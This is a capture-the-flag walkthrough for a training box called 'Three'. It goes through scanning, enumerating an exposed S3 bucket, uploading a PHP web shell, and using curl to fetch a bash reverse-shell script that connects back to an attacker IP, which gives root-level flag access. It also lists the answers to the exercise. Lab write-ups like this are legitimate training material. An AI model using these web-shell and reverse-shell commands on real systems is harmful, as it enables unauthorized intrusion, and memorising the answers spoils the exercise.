Three
Initial Scan
nmap -sV -T4 -v 10.129.232.222
Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-16 18:35 EDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:35
Scanning 10.129.232.222 [2 ports]
Completed Ping Scan at 18:35, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:35
Completed Parallel DNS resolution of 1 host. at 18:35, 0.08s elapsed
Initiating Connect Scan at 18:35
Scanning 10.129.232.222 [1000 ports]
Discovered open port 22/tcp on 10.129.232.222
Discovered open port 80/tcp on 10.129.232.222
Completed Connect Scan at 18:35, 0.71s elapsed (1000 total ports)
Initiating Service scan at 18:35
Scanning 2 services on 10.129.232.222
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 18:35 (0:00:06 remaining)
Completed Service scan at 18:35, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.232.222.
Initiating NSE at 18:35
Completed NSE at 18:35, 0.26s elapsed
Initiating NSE at 18:35
Completed NSE at 18:35, 0.20s elapsed
Nmap scan report for 10.129.232.222
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.98 seconds
Task 1
How many TCP ports are open?
Found within the initial scan
Answer: 2
Task 2
What is the domain of the email address provided in the "Contact" section of the website?
We see port 80 open on the target, when browsing the website of the target, going to Contact we see the email address.
Answer: thetoppers.htb
Task 3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
General knowledge. Using the Host file on various systems can be used in lieu of a DNS server if they are hosted internally.
Answer: /etc/hosts
Task 4
Which sub-domain is discovered during further enumeration?
After editing the host file to map the IP to the domain, we can use Gobuster to help enumerate the site.
Answer: s3.thetoppers.htb
Task 5
Which service is running on the discovered sub-domain?
Since it's s3 by amazon, also if we google: s3 subdomain
Answer: Amazon S3
Task 6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
Knowing it's amazon S3, what can we use to interact with it? Googling "Interact with Amazon S3" will give us our result
Answer: awscli
Task 7
Which command is used to set up the AWS CLI installation?
aws help
will give us our answer.
Answer: aws configure
Task 8
What is the command used by the above utility to list all of the S3 buckets?
After configuring aws
we can look at the S3 documentation.
Answer: aws s3 ls
Task 9
This server is configured to run files written in what web scripting language?
Looking at the buckets with: aws --endpoint=http://s3.thetoppers.htb s3 ls
we can go into this further: aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
With this basic info we can see this would use PHP
Answer: PHP
Task 10
Submit Root Flag
So knowing it runs on PHP and with Amazons S3, we are going to work on getting a remote shell. Googling "get shell with php" I see we can use the system()
function which takes the URL parameter cmd
as an input and executes it as a system command.
echo '<?php system($_GET["cmd"]); ?>' > shell.php
With the shell file created, we can use cp
to get the file onto the server and run CMD.
Confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php.
We are met with: uid=33(www-data) gid=33(www-data) groups=33(www-data)
the output of the OS command id
.
Now lets make a revershell script
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.119/1337 0>&1
Going to open a netcat shell with nc -nvlp 1337
Now open a temp webserver to pull our script from: python3 -m http.server 8081
Now we can use curl to get our script onto the server and executing it:
http://thetoppers.htb/shell.php?cmd=curl%20%3C10.10.14.119%3E:8081/shell.sh|bash
We now can see our reverse shell:
Now we can locate the flag and cat it's contents
Answer: a980d99281a28d638ac68b9bf9453c2b
Last updated